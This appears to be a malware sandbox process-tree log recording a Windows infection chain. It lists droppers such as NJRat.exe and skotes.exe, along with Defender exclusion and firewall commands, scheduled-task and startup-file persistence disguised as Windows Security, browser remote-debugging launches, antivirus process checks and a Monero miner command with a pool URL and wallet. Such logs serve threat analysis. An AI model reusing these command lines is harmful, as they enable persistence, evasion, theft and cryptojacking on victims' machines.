C:\Users\Admin\AppData\Local\Temp\Files\m.exe"C:\Users\Admin\AppData\Local\Temp\Files\m.exe"3⤵PID:868
-
-
C:\Users\Admin\AppData\Local\Temp\Files\caspol.exe"C:\Users\Admin\AppData\Local\Temp\Files\caspol.exe"3⤵
- Suspicious use of SetThreadContext
PID:2940 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\caspol.exe"4⤵
- Command and Scripting Interpreter: PowerShell
PID:6152
-
-
C:\Users\Admin\AppData\Local\Temp\Files\caspol.exe"C:\Users\Admin\AppData\Local\Temp\Files\caspol.exe"4⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:5840
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\test13.exe"C:\Users\Admin\AppData\Local\Temp\Files\test13.exe"3⤵PID:1456
-
-
C:\Users\Admin\AppData\Local\Temp\Files\kitty.exe"C:\Users\Admin\AppData\Local\Temp\Files\kitty.exe"3⤵PID:2020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 5084⤵
- Program crash
PID:2060
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe"C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe"3⤵
- Checks processor information in registry
PID:5024 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:6324 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffba052cc40,0x7ffba052cc4c,0x7ffba052cc585⤵PID:6828
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1860,i,11084325555788452065,2895205223991792907,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1852 /prefetch:25⤵PID:848
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2120,i,11084325555788452065,2895205223991792907,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2132 /prefetch:35⤵PID:4128
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2224,i,11084325555788452065,2895205223991792907,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2200 /prefetch:85⤵PID:2300
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3112,i,11084325555788452065,2895205223991792907,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3124 /prefetch:15⤵
- Uses browser remote debugging
PID:5384
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3132,i,11084325555788452065,2895205223991792907,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3352 /prefetch:15⤵
- Uses browser remote debugging
PID:7032
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4604,i,11084325555788452065,2895205223991792907,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4132 /prefetch:15⤵
- Uses browser remote debugging
PID:7012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4616,i,11084325555788452065,2895205223991792907,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4712 /prefetch:85⤵PID:5008
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:6616 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffba18d3cb8,0x7ffba18d3cc8,0x7ffba18d3cd85⤵PID:5844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,5734649495410989,8251216313774810016,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1896 /prefetch:25⤵PID:6604
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1844,5734649495410989,8251216313774810016,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1916 /prefetch:35⤵PID:6532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1844,5734649495410989,8251216313774810016,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2488 /prefetch:85⤵PID:6312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1844,5734649495410989,8251216313774810016,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:15⤵
- Uses browser remote debugging
PID:6576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1844,5734649495410989,8251216313774810016,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:15⤵
- Uses browser remote debugging
PID:2240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,5734649495410989,8251216313774810016,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1876 /prefetch:25⤵PID:6648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,5734649495410989,8251216313774810016,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1832 /prefetch:25⤵PID:5684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1844,5734649495410989,8251216313774810016,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4676 /prefetch:15⤵
- Uses browser remote debugging
PID:6200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1844,5734649495410989,8251216313774810016,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:15⤵
- Uses browser remote debugging
PID:2084
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JKEHIIJJECFH" & exit4⤵PID:6888
-
C:\Windows\SysWOW64\timeout.exetimeout /t 105⤵
- Delays execution with timeout.exe
PID:4992
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Rage.exe"C:\Users\Admin\AppData\Local\Temp\Files\Rage.exe"3⤵PID:1552
-
C:\ProgramData\wvtynvwe\AutoIt3.exe"C:\ProgramData\wvtynvwe\AutoIt3.exe" C:\ProgramData\wvtynvwe\clxs.a3x4⤵PID:2924
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\t.exe"C:\Users\Admin\AppData\Local\Temp\Files\t.exe"3⤵PID:2348
-
-
C:\Users\Admin\AppData\Local\Temp\Files\TikTok18.exe"C:\Users\Admin\AppData\Local\Temp\Files\TikTok18.exe"3⤵
- Adds Run key to start application
PID:5380
-
-
C:\Users\Admin\AppData\Local\Temp\Files\OfferedBuilt.exe"C:\Users\Admin\AppData\Local\Temp\Files\OfferedBuilt.exe"3⤵PID:6508
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Dominant Dominant.cmd & Dominant.cmd4⤵PID:1320
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:3700
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"5⤵PID:3424
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:3564
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"5⤵PID:4620
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 735485⤵PID:6636
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "EvilTeethMagnificentSub" Shoulder5⤵PID:7064
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Appreciated + Consequences + Atmospheric + Under + Medium + Edt + Launched + Expert + Ready + Korean + Cite + Suspended + Set + Maple 73548\h5⤵PID:2796
-
-
C:\Users\Admin\AppData\Local\Temp\73548\Mph.pif73548\Mph.pif 73548\h5⤵PID:6488
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "GaiaTrack" /tr "wscript //B 'C:\Users\Admin\AppData\Local\EcoOptimize Solutions\GaiaTrack.js'" /sc onlogon /F /RL HIGHEST6⤵
- Scheduled Task/Job: Scheduled Task
PID:6844
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 155⤵
- Delays execution with timeout.exe
PID:900
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\NJRat.exe"C:\Users\Admin\AppData\Local\Temp\Files\NJRat.exe"3⤵
- Drops startup file
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4964 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Files\NJRat.exe" "NJRat.exe" ENABLE4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:764
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\jerniuiopu.exe"C:\Users\Admin\AppData\Local\Temp\Files\jerniuiopu.exe"3⤵
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:3576 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "NET framework" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\jerniuiopu.exe" /rl HIGHEST /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5908
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\loader_5879465914.exe"C:\Users\Admin\AppData\Local\Temp\Files\loader_5879465914.exe"3⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6916
-
-
C:\Users\Admin\AppData\Local\Temp\Files\crazyCore.exe"C:\Users\Admin\AppData\Local\Temp\Files\crazyCore.exe"3⤵PID:7148
-
-
C:\Users\Admin\AppData\Local\Temp\Files\boooba.exe"C:\Users\Admin\AppData\Local\Temp\Files\boooba.exe"3⤵PID:7132
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Files\boooba.exe"4⤵PID:6184
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\Admin\IOAshdohSha.exe"5⤵PID:7144
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\Admin\IOAshdohSha.exe"6⤵
- Scheduled Task/Job: Scheduled Task
PID:1436
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\IOAshdohSha.exe"5⤵PID:6180
-
C:\Users\Admin\IOAshdohSha.exeC:\Users\Admin\IOAshdohSha.exe6⤵PID:6304
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\IOAshdohSha.exe"7⤵
- Suspicious use of SetThreadContext
PID:2552 -
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵PID:5480
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"9⤵PID:5128
-
-
-
C:\Windows\System32\nslookup.exeC:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=1008⤵PID:1264
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\zcc.exe"C:\Users\Admin\AppData\Local\Temp\Files\zcc.exe"3⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:2932 -
C:\Windows\system32\msiexec.exe"C:\Windows\system32\msiexec.exe"4⤵
- Adds Run key to start application
PID:6588
-
-
C:\Windows\system32\audiodg.exe"C:\Windows\system32\audiodg.exe"4⤵
- Adds Run key to start application
PID:2636
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"4⤵PID:7000
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"3⤵PID:5772
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & echo URL="C:\Users\Admin\AppData\Local\CyberSphere Dynamics\ZeusChat.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & exit2⤵
- Drops startup file
PID:236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6716
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"2⤵PID:5644
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:5908
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:5752
-
-
C:\Windows\System32\dwm.exeC:\Windows\System32\dwm.exe2⤵
- Suspicious use of SendNotifyMessage
PID:6316
-
-
C:\Users\Admin\AppData\Local\Temp\4FA6.tmp.x.exe"C:\Users\Admin\AppData\Local\Temp\4FA6.tmp.x.exe"2⤵PID:3120
-
-
C:\Users\Admin\AppData\Local\Temp\5D72.tmp.zx.exe"C:\Users\Admin\AppData\Local\Temp\5D72.tmp.zx.exe"2⤵PID:772
-
C:\Users\Admin\AppData\Local\Temp\5D72.tmp.zx.exe"C:\Users\Admin\AppData\Local\Temp\5D72.tmp.zx.exe"3⤵
- Loads dropped DLL
PID:5424
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TranscribeX.url" & echo URL="C:\Users\Admin\AppData\Local\AudioSync Innovations\TranscribeX.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TranscribeX.url" & exit2⤵
- Drops startup file
PID:5552
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3100 -ip 31001⤵PID:1792
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5128
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:4784
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4920
-
C:\ProgramData\losai\nwdxif.exeC:\ProgramData\losai\nwdxif.exe1⤵
- Executes dropped EXE
PID:2096
-
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3456
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2844 -ip 28441⤵PID:1160
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5016
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:5464
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:4620
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6084
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6356
-
C:\ProgramData\dllhost.exeC:\ProgramData\dllhost.exe1⤵
- Executes dropped EXE
PID:5168
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6484
-
C:\ProgramData\dllhost.exeC:\ProgramData\dllhost.exe1⤵
- Executes dropped EXE
PID:4708
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2692
-
C:\ProgramData\dllhost.exeC:\ProgramData\dllhost.exe1⤵
- Executes dropped EXE
PID:4164
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6904
-
C:\ProgramData\dllhost.exeC:\ProgramData\dllhost.exe1⤵PID:5204
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5380
-
C:\ProgramData\dllhost.exeC:\ProgramData\dllhost.exe1⤵PID:5604
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 3856 -ip 38561⤵PID:6112
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6404
-
C:\ProgramData\dllhost.exeC:\ProgramData\dllhost.exe1⤵PID:5824
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2020 -ip 20201⤵PID:1124
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1188
-
C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exeC:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1884
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:4148
-
C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe" -service -lunch1⤵PID:7032
-
C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"2⤵PID:6756
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4520
-
C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exeC:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6840
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1092
-
C:\ProgramData\dllhost.exeC:\ProgramData\dllhost.exe1⤵PID:3620
-
